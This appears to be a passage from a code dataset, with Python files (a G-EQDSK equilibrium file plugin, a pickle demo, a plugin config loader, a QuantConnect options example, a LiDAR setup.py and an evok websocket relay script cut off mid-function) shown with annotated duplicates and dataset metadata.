    _write_data(p["limrz"].reshape([p["limrz"].size]))
    return
def sp_imas_equilibrium_to_geqdsk(eq, nw=125, nh=125):
    """Convert an IMAS-style equilibrium object *eq* into a geqdsk dict.

    The equilibrium's 2D flux map is resampled onto a regular ``nw`` x
    ``nh`` rectangular grid with cubic interpolation.

    :param eq: equilibrium object; its ``coordinate_system``,
               ``global_quantities``, ``boundary`` and
               ``profiles_1d``/``profiles_2d`` attributes are read
    :param nw: number of horizontal (R) grid points of the output map
    :param nh: number of vertical (Z) grid points of the output map
    :return: dict with the keys expected by ``sp_write_geqdsk``
    """
    from fytok.numlib import interpolate
    coord_r = eq.coordinate_system.r
    coord_z = eq.coordinate_system.z
    # bounding box of the source grid defines the geqdsk computation box
    rleft = coord_r.min()
    rdim = coord_r.max() - coord_r.min()
    zdim = coord_z.max() - coord_z.min()
    # rdim = 0.0
    # zdim = 0.0
    rcentr = eq.boundary.geometric_axis.r
    # rleft = 0.0
    zmid = eq.boundary.geometric_axis.z
    rmaxis = eq.global_quantities.magnetic_axis.r
    zmaxis = eq.global_quantities.magnetic_axis.z
    simag = eq.global_quantities.psi_axis
    sibry = eq.global_quantities.psi_boundary
    bcentr = eq.global_quantities.magnetic_axis.b_field_tor
    current = eq.global_quantities.ip
    # boundary: last closed flux surface packed as an [n, 2] (R, Z) array
    rbbs = eq.boundary.lcfs.r
    zbbs = eq.boundary.lcfs.z
    bbsrz = np.append(rbbs.reshape([1, rbbs.size]), zbbs.reshape(
        [1, rbbs.size]), axis=0).transpose()
    # psi: resample the source flux map onto the regular output grid.
    # The first column of the source coordinates is appended again —
    # presumably to close a periodic direction before scattering into
    # griddata (TODO confirm against the coordinate_system definition).
    grid_r, grid_z = np.mgrid[rleft:rleft + rdim: nw *
                              1j, zmid - zdim / 2: zmid + zdim / 2: nh * 1j]
    coord_r = np.append(coord_r[:, :], coord_r[:, 0].reshape(
        coord_r.shape[0], 1), axis=1)
    coord_z = np.append(coord_z[:, :], coord_z[:, 0].reshape(
        coord_z.shape[0], 1), axis=1)
    points = np.append(coord_r.reshape(
        [coord_r.size, 1]), coord_z.reshape([coord_z.size, 1]), axis=1)
    psi = eq.profiles_2d[1].psi
    # NOTE(review): this slice assumes psi has at least the (extended)
    # shape of coord_r — verify for sources without the wrapped column.
    values = psi[:coord_r.shape[0], :coord_r.shape[1]].reshape(points.shape[0])
    psirz = interpolate.griddata(
        points, values, (grid_r, grid_z), method='cubic').transpose()
    # 1D profiles are copied through unchanged
    fpol = eq.profiles_1d.f
    pres = eq.profiles_1d.pressure
    ffprim = eq.profiles_1d.f_df_dpsi
    pprim = eq.profiles_1d.dpressure_dpsi
    qpsi = eq.profiles_1d.q
    return {
        "nw": nw,
        "nh": nh,
        "rdim": rdim,
        "zdim": zdim,
        "rcentr": rcentr,
        "rleft": rleft,
        "zmid": zmid,
        "rmaxis": rmaxis,
        "zmaxis": zmaxis,
        "simag": simag,
        "sibry": sibry,
        "bcentr": bcentr,
        "current": current,
        "bbsrz": bbsrz,
        "psirz": psirz,
        "fpol": fpol,
        "pres": pres,
        "ffprim": ffprim,
        "pprim": pprim,
        "qpsi": qpsi
    }
def sp_geqdsk_to_imas_equilibrium(geqdsk, eq: Dict = None) -> Dict:
    """Populate an IMAS-style equilibrium mapping from a parsed geqdsk dict.

    :param geqdsk: dict as returned by ``sp_read_geqdsk``
    :param eq: target mapping; a fresh ``Dict`` is created when omitted
    :return: *eq* with the vacuum field, global quantities, boundary
             outline, rectangular 2D flux map and 1D profiles filled in
    """
    if eq is None:
        eq = Dict()

    # eq.time = 0.0
    eq["vacuum_toroidal_field.r0"] = geqdsk["rcentr"]
    eq["vacuum_toroidal_field.b0"] = geqdsk["bcentr"]

    eq["global_quantities.magnetic_axis.r"] = geqdsk["rmaxis"]
    eq["global_quantities.magnetic_axis.z"] = geqdsk["zmaxis"]
    eq["global_quantities.psi_axis"] = geqdsk["simag"]
    eq["global_quantities.psi_boundary"] = geqdsk["sibry"]
    eq["global_quantities.ip"] = geqdsk["current"]

    # boundary outline: split the [n, 2] (R, Z) array into its columns
    outline = geqdsk["bbsrz"]
    eq["boundary.outline.r"] = outline[:, 0]
    eq["boundary.outline.z"] = outline[:, 1]

    # rectangular profiles_2d grid spanning the stored computation box
    nw = geqdsk["nw"]
    nh = geqdsk["nh"]
    r_lo = geqdsk["rleft"]
    r_hi = r_lo + geqdsk["rdim"]
    half_z = geqdsk["zdim"] / 2
    z_lo = geqdsk["zmid"] - half_z
    z_hi = geqdsk["zmid"] + half_z
    eq["profiles_2d.grid_type"] = "rectangular"
    eq["profiles_2d.grid_index"] = 1
    eq["profiles_2d.grid.dim1"] = np.linspace(r_lo, r_hi, nw)
    eq["profiles_2d.grid.dim2"] = np.linspace(z_lo, z_hi, nh)
    eq["profiles_2d.psi"] = geqdsk["psirz"].T

    # 1D profiles on a uniform psi grid from axis to boundary
    eq["profiles_1d.f"] = geqdsk["fpol"]
    eq["profiles_1d.f_df_dpsi"] = geqdsk["ffprim"]
    eq["profiles_1d.pressure"] = geqdsk["pres"]
    eq["profiles_1d.dpressure_dpsi"] = geqdsk["pprim"]
    eq["profiles_1d.q"] = geqdsk["qpsi"]
    eq["profiles_1d.psi"] = np.linspace(geqdsk["simag"], geqdsk["sibry"], nw)
    eq["profiles_1d.grid"] = {
        "r0": geqdsk["rcentr"],
        "b0": geqdsk["bcentr"],
        "psi_norm": np.linspace(0, 1.0, nw),
        "psi_axis": geqdsk["simag"],
        "psi_boundary": geqdsk["sibry"],
    }
    return eq
class GEQdskFile(File):
    """File plugin exposing G-EQDSK files through the spdm ``File`` interface.

    Reading converts the geqdsk content into an IMAS-style equilibrium
    entry; writing converts an equilibrium object back to geqdsk format.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        path = self.path
        mode = self.mode_str
        try:
            self._fid = open(path, mode=mode)
        except OSError as error:
            # NOTE(review): FileExistsError is a surprising type for a
            # generic open failure (OSError covers far more than "already
            # exists") — confirm whether callers depend on it before
            # changing.
            raise FileExistsError(f"Can not open file {path}! {error}")
        else:
            logger.debug(f"Open File {path} mode={mode}")

    def flush(self, *args, **kwargs):
        # Persist only when the file was opened for (exclusive) writing.
        if "x" in self.mode or "w" in self.mode:
            self.save(self.path)

    def read(self, lazy=False) -> Entry:
        # *lazy* is accepted for interface compatibility but ignored here.
        return sp_geqdsk_to_imas_equilibrium(sp_read_geqdsk(self._fid)).entry

    def write(self, d):
        # Convert the equilibrium object to geqdsk form, then serialize it.
        geqdsk = sp_imas_equilibrium_to_geqdsk(d)
        sp_write_geqdsk(geqdsk, self._fid)
__SP_EXPORT__ = GEQdskFile
| <filename>python/spdm/plugins/data/file/PluginGEQdsk.py<gh_stars>0
import collections
import pathlib
import pprint
from functools import cached_property
import numpy as np
from spdm.common.logger import logger
from spdm.data.Node import Dict
from spdm.data.Entry import Entry, _next_
from spdm.data.File import File
def sp_read_geqdsk(file):
"""
:param file: input file / file path
:return: profile object
"""
description = file.read(48)
idum = int(file.read(4))
nw = int(file.read(4))
nh = int(file.read(4))
file.readline()
rdim = float(file.read(16))
zdim = float(file.read(16))
rcentr = float(file.read(16))
rleft = float(file.read(16))
zmid = float(file.read(16))
file.readline()
rmaxis = float(file.read(16))
zmaxis = float(file.read(16))
simag = float(file.read(16))
sibry = float(file.read(16))
bcentr = float(file.read(16))
file.readline()
current = float(file.read(16))
simag = float(file.read(16))
xdum = float(file.read(16))
rmaxis = float(file.read(16))
xdum = float(file.read(16))
file.readline()
zmaxis = float(file.read(16))
xdum = float(file.read(16))
sibry = float(file.read(16))
xdum = float(file.read(16))
xdum = float(file.read(16))
file.readline()
def _read_data(count, width=16):
data = []
for n in range(count):
data.append(float(file.read(width)))
if n >= count - 1 or ((n + 1) % 5 == 0):
file.readline()
data = np.asarray(data)
return data
#
fpol = _read_data(nw)
pres = _read_data(nw)
ffprim = _read_data(nw)
pprim = _read_data(nw)
psirz = _read_data(nw * nh).reshape([nh, nw])
qpsi = _read_data(nw)
try:
nbbs = int(file.read(5))
limitr = int(file.read(5))
file.readline()
bbsrz = _read_data(nbbs * 2).reshape([nbbs, 2])
limrz = _read_data(limitr * 2).reshape([limitr, 2])
except:
nbbs = 0
limitr = 0
bbsrz = None
limrz = None
data = {
"description": description,
# "idum": idum,
"nw": nw,
"nh": nh,
"rdim": rdim,
"zdim": zdim,
"rcentr": rcentr,
"rleft": rleft,
"zmid": zmid,
"rmaxis": rmaxis,
"zmaxis": zmaxis,
"simag": simag,
"sibry": sibry,
"bcentr": bcentr,
"current": current,
# "simag": simag,
# "rmaxis": rmaxis,
# "zmaxis": zmaxis,
# "sibry": sibry,
"fpol": fpol,
"pres": pres,
"ffprim": ffprim,
"pprim": pprim,
"psirz": psirz,
"qpsi": qpsi,
"bbsrz": bbsrz,
"limrz": limrz,
}
return data
def sp_write_geqdsk(p, file):
"""
:param profile: object
:param file: file path / file
:return:
"""
nw = p["nw"]
nh = p["nh"]
file.write("%48s%4i%4i%4i\n" % (p["description"], 3, p["nw"], p["nh"]))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["rdim"], p["zdim"], p["rcentr"], p["rleft"], p["zmid"]))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["rmaxis"], p["zmaxis"], p["simag"], p["sibry"], p["bcentr"]))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["current"], p["simag"], 0, p["rmaxis"], 0))
file.write("%16.9e%16.9e%16.9e%16.9e%16.9e\n" %
(p["zmaxis"], 0, p["sibry"], 0, 0))
def _write_data(d):
count = len(d)
for n in range(count):
file.write("%16.9e" % d[n])
if (n == count - 1) or ((n + 1) % 5 == 0):
file.write('\n')
_write_data(p["fpol"])
_write_data(p["pres"])
_write_data(p["ffprim"])
_write_data(p["pprim"])
_write_data(p["psirz"].reshape([nw * nh]))
_write_data(p["qpsi"])
file.write("%5i%5i\n" % (p["bbsrz"].shape[0], p["limrz"].shape[0]))
_write_data(p["bbsrz"].reshape([p["bbsrz"].size]))
_write_data(p["limrz"].reshape([p["limrz"].size]))
return
def sp_imas_equilibrium_to_geqdsk(eq, nw=125, nh=125):
from fytok.numlib import interpolate
coord_r = eq.coordinate_system.r
coord_z = eq.coordinate_system.z
rleft = coord_r.min()
rdim = coord_r.max() - coord_r.min()
zdim = coord_z.max() - coord_z.min()
# rdim = 0.0
# zdim = 0.0
rcentr = eq.boundary.geometric_axis.r
# rleft = 0.0
zmid = eq.boundary.geometric_axis.z
rmaxis = eq.global_quantities.magnetic_axis.r
zmaxis = eq.global_quantities.magnetic_axis.z
simag = eq.global_quantities.psi_axis
sibry = eq.global_quantities.psi_boundary
bcentr = eq.global_quantities.magnetic_axis.b_field_tor
current = eq.global_quantities.ip
# boundary
rbbs = eq.boundary.lcfs.r
zbbs = eq.boundary.lcfs.z
bbsrz = np.append(rbbs.reshape([1, rbbs.size]), zbbs.reshape(
[1, rbbs.size]), axis=0).transpose()
# psi
grid_r, grid_z = np.mgrid[rleft:rleft + rdim: nw *
1j, zmid - zdim / 2: zmid + zdim / 2: nh * 1j]
coord_r = np.append(coord_r[:, :], coord_r[:, 0].reshape(
coord_r.shape[0], 1), axis=1)
coord_z = np.append(coord_z[:, :], coord_z[:, 0].reshape(
coord_z.shape[0], 1), axis=1)
points = np.append(coord_r.reshape(
[coord_r.size, 1]), coord_z.reshape([coord_z.size, 1]), axis=1)
psi = eq.profiles_2d[1].psi
values = psi[:coord_r.shape[0], :coord_r.shape[1]].reshape(points.shape[0])
psirz = interpolate.griddata(
points, values, (grid_r, grid_z), method='cubic').transpose()
# profile
fpol = eq.profiles_1d.f
pres = eq.profiles_1d.pressure
ffprim = eq.profiles_1d.f_df_dpsi
pprim = eq.profiles_1d.dpressure_dpsi
qpsi = eq.profiles_1d.q
return {
"nw": nw,
"nh": nh,
"rdim": rdim,
"zdim": zdim,
"rcentr": rcentr,
"rleft": rleft,
"zmid": zmid,
"rmaxis": rmaxis,
"zmaxis": zmaxis,
"simag": simag,
"sibry": sibry,
"bcentr": bcentr,
"current": current,
"bbsrz": bbsrz,
"psirz": psirz,
"fpol": fpol,
"pres": pres,
"ffprim": ffprim,
"pprim": pprim,
"qpsi": qpsi
}
def sp_geqdsk_to_imas_equilibrium(geqdsk, eq: Dict = None) -> Dict:
if eq is None:
eq = Dict()
# eq.time = 0.0
eq["vacuum_toroidal_field.r0"] = geqdsk["rcentr"]
eq["vacuum_toroidal_field.b0"] = geqdsk["bcentr"]
# rleft = 0.0
eq["global_quantities.magnetic_axis.r"] = geqdsk["rmaxis"]
eq["global_quantities.magnetic_axis.z"] = geqdsk["zmaxis"]
# eq["global_quantities.magnetic_axis.b_field_tor"] = geqdsk["bcentr"]
eq["global_quantities.psi_axis"] = geqdsk["simag"]
eq["global_quantities.psi_boundary"] = geqdsk["sibry"]
eq["global_quantities.ip"] = geqdsk["current"]
# boundary
eq["boundary.outline.r"] = geqdsk["bbsrz"][:, 0]
eq["boundary.outline.z"] = geqdsk["bbsrz"][:, 1]
nw = geqdsk["nw"]
nh = geqdsk["nh"]
rmin = geqdsk["rleft"]
rmax = geqdsk["rleft"] + geqdsk["rdim"]
zmin = geqdsk["zmid"] - geqdsk["zdim"]/2
zmax = geqdsk["zmid"] + geqdsk["zdim"]/2
eq["profiles_2d.grid_type"] = "rectangular"
eq["profiles_2d.grid_index"] = 1
eq["profiles_2d.grid.dim1"] = np.linspace(rmin, rmax, nw)
eq["profiles_2d.grid.dim2"] = np.linspace(zmin, zmax, nh)
eq["profiles_2d.psi"] = geqdsk["psirz"].T
# profile
eq["profiles_1d.f"] = geqdsk["fpol"]
eq["profiles_1d.f_df_dpsi"] = geqdsk["ffprim"]
eq["profiles_1d.pressure"] = geqdsk["pres"]
eq["profiles_1d.dpressure_dpsi"] = geqdsk["pprim"]
eq["profiles_1d.q"] = geqdsk["qpsi"]
eq["profiles_1d.psi"] = np.linspace(geqdsk["simag"], geqdsk["sibry"], nw)
eq["profiles_1d.grid"] = {
"r0": geqdsk["rcentr"],
"b0": geqdsk["bcentr"],
"psi_norm": np.linspace(0, 1.0, nw),
"psi_axis": geqdsk["simag"],
"psi_boundary": geqdsk["sibry"],
}
return eq
class GEQdskFile(File):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
path = self.path
mode = self.mode_str
try:
self._fid = open(path, mode=mode)
except OSError as error:
raise FileExistsError(f"Can not open file {path}! {error}")
else:
logger.debug(f"Open File {path} mode={mode}")
def flush(self, *args, **kwargs):
if "x" in self.mode or "w" in self.mode:
self.save(self.path)
def read(self, lazy=False) -> Entry:
return sp_geqdsk_to_imas_equilibrium(sp_read_geqdsk(self._fid)).entry
def write(self, d):
geqdsk = sp_imas_equilibrium_to_geqdsk(d)
sp_write_geqdsk(geqdsk, self._fid)
__SP_EXPORT__ = GEQdskFile
| en | 0.576307 | :param file: input file / file path :return: profile object # # "idum": idum, # "simag": simag, # "rmaxis": rmaxis, # "zmaxis": zmaxis, # "sibry": sibry, :param profile: object :param file: file path / file :return: # rdim = 0.0 # zdim = 0.0 # rleft = 0.0 # boundary # psi # profile # eq.time = 0.0 # rleft = 0.0 # eq["global_quantities.magnetic_axis.b_field_tor"] = geqdsk["bcentr"] # boundary # profile | 2.08487 | 2 |
Python Files/pickle1.py | Nmane1612/Nihar-Mane | 3 | 6613995 | <filename>Python Files/pickle1.py<gh_stars>1-10
import pickle
class Human:
    """Person record whose name and age are collected interactively."""

    def __init__(self):
        # Both fields are read from the console, in this prompt order.
        self.name, self.age = (input("Enter your name : "),
                               input("Enter your age : "))

    def disp(self):
        """Print a one-line greeting built from the stored name and age."""
        message = "Hello {}, You are {} year old!".format(self.name, self.age)
        print(message)
# Demo: create a Human (prompts on stdin) and persist it with pickle.
with open("Human.dat", "wb") as f:
    insaan=Human()
    pickle.dump(insaan,f)
#f.seek(0,0)
# Load the object back and exercise it.  pickle.load raises EOFError on
# an empty/exhausted file, which is reported instead of crashing.
with open("Human.dat", "rb") as f:
    try:
        maanav=pickle.load(f)
        maanav.disp()
        print(maanav.name)
    except EOFError:
        print("Done with object")
| <filename>Python Files/pickle1.py<gh_stars>1-10
import pickle
class Human:
def __init__(self):
self.name=input("Enter your name : ")
self.age=input("Enter your age : ")
def disp(self):
print("Hello {}, You are {} year old!".format(self.name,self.age))
with open("Human.dat", "wb") as f:
insaan=Human()
pickle.dump(insaan,f)
#f.seek(0,0)
with open("Human.dat", "rb") as f:
try:
maanav=pickle.load(f)
maanav.disp()
print(maanav.name)
except EOFError:
print("Done with object")
| es | 0.390157 | #f.seek(0,0) | 3.419217 | 3 |
project/plugin.py | Signiant/External-user-provisioning | 0 | 6613996 | <filename>project/plugin.py
import ast
import imp,os
import site

# Plugins are looked up under <site-packages>/project/plugins; every
# plugin is a sub-directory whose entry module is "__init__.py".
# NOTE(review): the ``imp`` module is deprecated (removed in Python 3.12)
# — consider migrating to ``importlib`` when touching this module.
pluginFolder = site.getsitepackages()[0] +"/project/plugins"

# Abort immediately when the expected plugin directory is missing.
if not os.path.isdir(pluginFolder):
    print("\nThe path to the plugin folder is incorrect: " + site.getsitepackages()[0] +"/project/plugins")
    raise SystemExit
else:
    mainFile = "__init__"
def getAllPlugins():
    """Discover candidate plugins under ``pluginFolder``.

    A plugin is any sub-directory containing a ``__init__.py`` entry
    module.  Returns a list of ``{"name": ..., "info": ...}`` dicts where
    ``info`` is the ``imp.find_module`` result for the entry module.
    """
    found = []
    for entry in os.listdir(pluginFolder):
        location = os.path.join(pluginFolder, entry)
        if not os.path.isdir(location) or not mainFile + ".py" in os.listdir(location):
            continue
        module_info = imp.find_module(mainFile, [location])
        found.append({"name": entry, "info": module_info})
    return found
def loadPlugin(pluginName):
    """Import and return the plugin's ``__init__`` module.

    The module is loaded from ``<pluginFolder>/<pluginName>/__init__.py``
    and ``FileNotFoundError`` propagates when it does not exist.

    (The previous version retried the identical ``imp.load_source`` call
    inside an ``except FileNotFoundError`` handler — a redundant retry
    that could only fail again the same way; it has been removed.)
    """
    return imp.load_source(pluginName, os.path.join(pluginFolder, pluginName, mainFile + ".py"))
def getApiToken(configMap, plugin_tag):
    """Return the ApiToken of the plugin whose "plugin:tag" equals *plugin_tag*.

    Returns ``None`` when no configured plugin matches.
    """
    for entry in configMap['plugins']:
        if '{}:{}'.format(entry['plugin'], entry['tag']) == plugin_tag:
            return entry['ApiToken']
def getUrl(configMap, plugin_tag):
    """Return the url configured for *plugin_tag* (``None`` when absent)."""
    matches = (p['url'] for p in configMap['plugins']
               if p['plugin'] + ':' + p['tag'] == plugin_tag)
    return next(matches, None)
def getPermissions(configMap, plugin_tag):
    """Return the permission mapping for *plugin_tag* (``None`` when absent)."""
    for entry in configMap['plugins']:
        if entry['plugin'] + ':' + entry['tag'] != plugin_tag:
            continue
        return entry['permission']
def getGroups(configMap, plugin_tag):
    """Return the permission groups for *plugin_tag*; ``[]`` when none match.

    All entries are scanned, so when several plugins share the same tag
    the groups of the last matching entry win (as before).
    """
    groups = []
    for entry in configMap['plugins']:
        if entry['plugin'] + ':' + entry['tag'] == plugin_tag:
            groups = entry['permission']['groups']
    return groups
def inviteMessage(configMap, plugin_tag):
    """Return the invitation message for *plugin_tag* (``None`` when absent)."""
    for entry in configMap['plugins']:
        if ':'.join((entry['plugin'], entry['tag'])) == plugin_tag:
            return entry['message_invite']
def removalMessage(configMap, plugin_tag):
    """Return the removal message for *plugin_tag* (``None`` when absent)."""
    matches = (p['message_remove'] for p in configMap['plugins']
               if p['plugin'] + ':' + p['tag'] == plugin_tag)
    return next(matches, None)
def getCLIgroups(configMap, plugin_tag, allPermissions):
    """Resolve the groups for *plugin_tag* from CLI-supplied permission strings.

    Each element of *allPermissions* is the ``repr`` of a dict with a
    'plugin' key plus arbitrary group values, e.g.
    ``"{'plugin': 'slack:dev', 'groups': 'devs'}"``.  The first entry whose
    'plugin' matches wins and its remaining values are returned as a list;
    otherwise the statically configured groups are used as fallback.

    (The original kept a dead ``cli_groups`` accumulator and an
    always-true ``len() == 0`` check; both removed.  Entries lacking a
    'plugin' key are now skipped instead of raising ``KeyError``.)
    """
    for permission in allPermissions:
        parsed = ast.literal_eval(permission)
        if parsed.get('plugin') == plugin_tag:
            del parsed['plugin']
            return list(parsed.values())
    return getGroups(configMap, plugin_tag)
import ast
import imp,os
import site
pluginFolder = site.getsitepackages()[0] +"/project/plugins"
if not os.path.isdir(pluginFolder):
print("\nThe path to the plugin folder is incorrect: " + site.getsitepackages()[0] +"/project/plugins")
raise SystemExit
else:
mainFile = "__init__"
def getAllPlugins():
plugins = []
possibleplugins = os.listdir(pluginFolder)
for i in possibleplugins:
location = os.path.join(pluginFolder, i)
if not os.path.isdir(location) or not mainFile + ".py" in os.listdir(location):
continue
info = imp.find_module(mainFile, [location])
plugins.append({"name": i, "info": info})
return plugins
def loadPlugin(pluginName):
try:
return imp.load_source(pluginName, os.path.join(pluginFolder, pluginName, mainFile + ".py"))
except FileNotFoundError:
return imp.load_source(pluginName, os.path.join(pluginFolder, pluginName, mainFile + ".py"))
def getApiToken(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['ApiToken']
def getUrl(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['url']
def getPermissions(configMap, plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['permission']
def getGroups(configMap,plugin_tag):
groupsList=[]
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag']==plugin_tag:
groupsList=plugin['permission']['groups']
return groupsList
def inviteMessage(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['message_invite']
def removalMessage(configMap,plugin_tag):
for plugin in configMap['plugins']:
if plugin['plugin']+':'+plugin['tag'] == plugin_tag:
return plugin['message_remove']
def getCLIgroups(configMap, plugin_tag, allPermissions):
cli_groups = []
for permission in allPermissions:
thisPermissions = ast.literal_eval(permission)
if thisPermissions['plugin'] == plugin_tag:
del thisPermissions['plugin']
return list(thisPermissions.values())
if len(cli_groups) == 0:
return getGroups(configMap, plugin_tag) | none | 1 | 2.539265 | 3 | |
SaigeIncPythonExamples/SaigeIncPythonExamples.py | Synchronicity89/Lean | 0 | 6613997 | <reponame>Synchronicity89/Lean<gh_stars>0
from clr import AddReference
AddReference("System")
AddReference("QuantConnect.Algorithm")
AddReference("QuantConnect.Common")
from System import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from datetime import timedelta
### <summary>
### This example demonstrates how to add options for a given underlying equity security.
### It also shows how you can prefilter contracts easily based on strikes and expirations, and how you
### can inspect the option chain to pick a specific option contract to trade.
### </summary>
### <meta name="tag" content="using data" />
### <meta name="tag" content="options" />
### <meta name="tag" content="filter selection" />
class BasicTemplateOptionsAlgorithm(QCAlgorithm):
    """Subscribes to GOOG options, pre-filters the chain around the money,
    and trades the deepest-expiry contract from the sorted chain once."""

    def Initialize(self):
        """Set the backtest window, cash, option subscription and chain filter."""
        self.SetStartDate(2016, 1, 1)
        self.SetEndDate(2016, 1, 10)
        self.SetCash(100000)
        option = self.AddOption("GOOG")
        self.option_symbol = option.Symbol
        # set our strike/expiry filter for this option chain
        # (strikes within +/-2 of ATM, expiries from now to 180 days out)
        option.SetFilter(-2, +2, timedelta(0), timedelta(180))
        # use the underlying equity as the benchmark
        self.SetBenchmark("GOOG")

    def OnData(self,slice):
        """On each data slice, enter the selected contract with a market
        order and queue a closing market-on-close order (only while flat)."""
        if self.Portfolio.Invested: return
        for kvp in slice.OptionChains:
            if kvp.Key != self.option_symbol: continue
            chain = kvp.Value
            # we sort the contracts to find at the money (ATM) contract with farthest expiration
            # (three stable sorts: by distance-to-ATM, then expiry desc, then right desc)
            contracts = sorted(sorted(sorted(chain, \
                key = lambda x: abs(chain.Underlying.Price - x.Strike)), \
                key = lambda x: x.Expiry, reverse=True), \
                key = lambda x: x.Right, reverse=True)
            # if found, trade it
            if len(contracts) == 0: continue
            symbol = contracts[0].Symbol
            self.MarketOrder(symbol, 1)
            self.MarketOnCloseOrder(symbol, -1)

    def OnOrderEvent(self, orderEvent):
        """Log every order event for inspection."""
        self.Log(str(orderEvent))
| from clr import AddReference
AddReference("System")
AddReference("QuantConnect.Algorithm")
AddReference("QuantConnect.Common")
from System import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from datetime import timedelta
### <summary>
### This example demonstrates how to add options for a given underlying equity security.
### It also shows how you can prefilter contracts easily based on strikes and expirations, and how you
### can inspect the option chain to pick a specific option contract to trade.
### </summary>
### <meta name="tag" content="using data" />
### <meta name="tag" content="options" />
### <meta name="tag" content="filter selection" />
class BasicTemplateOptionsAlgorithm(QCAlgorithm):
def Initialize(self):
self.SetStartDate(2016, 1, 1)
self.SetEndDate(2016, 1, 10)
self.SetCash(100000)
option = self.AddOption("GOOG")
self.option_symbol = option.Symbol
# set our strike/expiry filter for this option chain
option.SetFilter(-2, +2, timedelta(0), timedelta(180))
# use the underlying equity as the benchmark
self.SetBenchmark("GOOG")
def OnData(self,slice):
if self.Portfolio.Invested: return
for kvp in slice.OptionChains:
if kvp.Key != self.option_symbol: continue
chain = kvp.Value
# we sort the contracts to find at the money (ATM) contract with farthest expiration
contracts = sorted(sorted(sorted(chain, \
key = lambda x: abs(chain.Underlying.Price - x.Strike)), \
key = lambda x: x.Expiry, reverse=True), \
key = lambda x: x.Right, reverse=True)
# if found, trade it
if len(contracts) == 0: continue
symbol = contracts[0].Symbol
self.MarketOrder(symbol, 1)
self.MarketOnCloseOrder(symbol, -1)
def OnOrderEvent(self, orderEvent):
self.Log(str(orderEvent)) | en | 0.770733 | ### <summary> ### This example demonstrates how to add options for a given underlying equity security. ### It also shows how you can prefilter contracts easily based on strikes and expirations, and how you ### can inspect the option chain to pick a specific option contract to trade. ### </summary> ### <meta name="tag" content="using data" /> ### <meta name="tag" content="options" /> ### <meta name="tag" content="filter selection" /> # set our strike/expiry filter for this option chain # use the underlying equity as the benchmark # we sort the contracts to find at the money (ATM) contract with farthest expiration # if found, trade it | 2.63196 | 3 |
class_3/supportlib.py | goosemanjack/python_intro_class | 0 | 6613998 |
def one():
    """Return the identifying message for function ``one``."""
    message = "This is the function one"
    return message
def two():
    """Return the identifying message for function ``two``."""
    return str("This is what comes from calling two")
|
def one():
return "This is the function one"
def two():
return "This is what comes from calling two"
| none | 1 | 2.259972 | 2 | |
library/lidar/setup.py | Hitachi-CTI-Call-For-Code-COVID-19-Team/edge-data-collector | 0 | 6613999 | <gh_stars>0
import setuptools

# Packaging metadata for the TFmini/TFmini Plus LiDAR (ToF) controller.
setuptools.setup(
    name="lidar",
    version="0.1.2",
    author="<NAME>",
    author_email="<EMAIL>",
    description="LiDAR (ToF) controller for TFmini/TFmini plus",
    long_description="This package provides LiDAR (ToF) controller for TFmini/TFmini plus.",
    long_description_content_type="text/markdown",
    url="",
    packages=setuptools.find_packages(),
    # no declared runtime dependencies
    install_requires=[
    ],
    classifiers=[
        "Programming Language :: Python :: 3.7.3",
        "License :: OSI Approved :: Apache License, Version 2.0",
        "Operating System :: OS Independent",
    ]
)
| import setuptools
setuptools.setup(
name="lidar",
version="0.1.2",
author="<NAME>",
author_email="<EMAIL>",
description="LiDAR (ToF) controller for TFmini/TFmini plus",
long_description="This package provides LiDAR (ToF) controller for TFmini/TFmini plus.",
long_description_content_type="text/markdown",
url="",
packages=setuptools.find_packages(),
install_requires=[
],
classifiers=[
"Programming Language :: Python :: 3.7.3",
"License :: OSI Approved :: Apache License, Version 2.0",
"Operating System :: OS Independent",
]
) | none | 1 | 1.093816 | 1 | |
examples/python/websocket3.py | wimstockman/evok | 0 | 6614000 | #############################################################################################################################
# Example 3: Basic websocket application to interact with evok api #
# Extension of the second example websocket2 #
# Adding a Long Press Button Event: #
# I implemented this on the client side #
# We start a Timer (longpress timer) on a button press #
# If the button is not released within 3 seconds we turn off all relays                                     #
# We achieve this by checking inside the timer function whether the long press is still active after 3s     #
# If the button is released before the 3 seconds are done we receive a message from the server #
# signaling the button is released by sending a bitvalue of 0 #
# if we receive this message we set the long_press_button_active = 0 #
# and we set the long_press_timer = 0 so our Timer exits #
# #
# #
# #
# #
# Example created by <NAME>                                                                                 #
# On 2019-05-15 #
#############################################################################################################################
import websocket
import time
import json
from threading import Thread
def dprint(e):
    """Print *e* only while the local debug switch is enabled."""
    debug = 1
    if not debug:
        return
    print(e)
class myhome():
    """Evok websocket client.

    Toggles relays from digital-input button presses and switches every
    relay off when a button is held for the long-press interval.
    """
    def __init__(self):
        # Countdown unit is 1/10 of a second, so 20 ticks ~= 2 seconds.
        self.WAITTIME = 20
        self.long_press_timer_countdown = 0
        self.long_press_button_active = 0
        self.Timer = None
        # Set to 1 while we are waiting for a relay-state reply that we
        # requested in order to toggle that relay.
        self.toggle_relay = 0
        # Digital-input circuit -> action: a digit toggles that relay,
        # 'allon' switches every relay on.
        self.di_relay_dict = {'1':'allon','2':'2','3':'3','4':'4','5':'5','6':'6','7':'7','8':'8'}
        self.ws = websocket.WebSocketApp("ws://localhost/ws",
                            on_message = lambda ws,msg: self.on_message(ws, msg),
                            on_error = lambda ws,msg: self.on_error(ws, msg),
                            on_close = lambda ws: self.on_close(ws),
                            on_open = lambda ws: self.on_open(ws))
        self.ws.run_forever()  # blocks until the connection closes

    def long_press_timer(self):
        """Worker-thread countdown: if the button is still held when the
        countdown expires, switch all relays off."""
        dprint("Timer is Started")
        self.long_press_button_active = 1
        while self.long_press_timer_countdown > 0:
            time.sleep(.1)
